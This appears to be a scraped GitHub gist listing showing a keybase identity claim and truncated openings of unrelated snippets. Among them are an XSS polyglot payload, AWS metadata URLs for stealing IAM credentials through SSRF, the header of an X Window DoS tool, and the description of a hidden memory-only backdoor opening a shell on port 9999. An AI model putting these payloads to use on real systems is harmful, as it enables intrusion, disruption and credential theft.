I hereby claim:
- I am epinna on github.
- I am epinna (https://keybase.io/epinna) on keybase.
- I have a public key whose fingerprint is 05F1 954C E1FB 4611 F742 8DF4 2041 EEA1 A192 B451
To claim this, I am signing this object:
| #!/usr/bin/env python | |
| # coding: utf-8 | |
| # | |
| # Copyright (C) Michael Ihde 2004 <[email protected]> | |
| # | |
| # Distributed under the Python License | |
| # | |
| # iprange is a useful module that creates iprange generators similar | |
| # to python's xrange. This allows you to write statements such as | |
| # |
| #!/usr/bin/env python | |
| # encoding: utf-8 | |
| # Setup introductions: | |
| # Open Namecheap website, select a domain (e.g. abc.com) then go to Advanced DNS | |
| # (Accounts > Domain List > Advanced DNS) | |
| # Insert an "A + Dynamic DNS Record", with hostname (e.g. my) and type whatnever IP address. | |
| # Edit scripts for proper HOSTNAME (e.g. my.abc.com) and APIKEY (Dynamic DNS Password). | |
| # Run and have fun! |
| ## AWS | |
| # from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
| http://169.254.169.254/latest/user-data | |
| http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
| http://169.254.169.254/latest/meta-data/ami-id | |
| http://169.254.169.254/latest/meta-data/reservation-id | |
| http://169.254.169.254/latest/meta-data/hostname | |
| http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
| FROM ubuntu:latest | |
| ARG LOCALE=en_US | |
| ARG CHARMAP=UTF-8 | |
| ARG DEBIAN_FRONTEND=noninteractive | |
| RUN dpkg --add-architecture i386 | |
| RUN apt-get update && apt-get --yes dist-upgrade && apt-get install --yes --no-install-recommends \ | |
| autoconf \ | |
| apache2 \ |
| # Tested with Python 3.5.2 | |
| from config import LOGLEVEL | |
| import logging | |
| class SrvLogFormat(logging.Formatter): | |
| err_fmt = "[E] %(msg)s" | |
| warn_fmt = "[!] %(msg)s" | |
| dbg_fmt = "[D] %(module)s: %(lineno)d: %(msg)s" |
| /* 2/5/00 1.0 | |
| Xsh0k.c by n0rby -- NeURaL CoLLaPsE CrEw. | |
| main code by AcidCrash -- NeURaL CoLLaPsE CrEw. | |
| This dos simply creates a sequence of socket connections to Xwindow port | |
| of a remote server. This cause a very disturbing effect to the XWindow user. | |
| There are many and various effects: frequently Xwindow slows so much that | |
| it's quite impossible to start new X programs; sometimes Xwindow don't | |
| recognizes some keys or mouse input, and, more rarely it crash and | |
| leave the user to the bash. |
I hereby claim:
To claim this, I am signing this object:
| jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e |
| #!/usr/bin/env python | |
| # This script prints a simple one-liner memory-only backdoor agent which hides from ps. | |
| # It renames itself within the process list using a really hackish (AND POTENTIALLY DANGEROUS) /proc/self/mem rewrite | |
| # and spawns a shell on port 9999. Just an experiment, there are simplest way to run unnoticed in the | |
| # process list (see the technique used by EmPyre: https://github.com/adaptivethreat/EmPyre) | |
| template = """ | |
| import sys,re,pty,os,socket |
| ''' | |
| Set ANSI Terminal Color and Attributes. | |
| http://code.activestate.com/recipes/574451-handling-ansi-terminal/ | |
| ''' | |
| from sys import stdout | |
| esc = '%s['%chr(27) | |
| reset = '%s0m'%esc |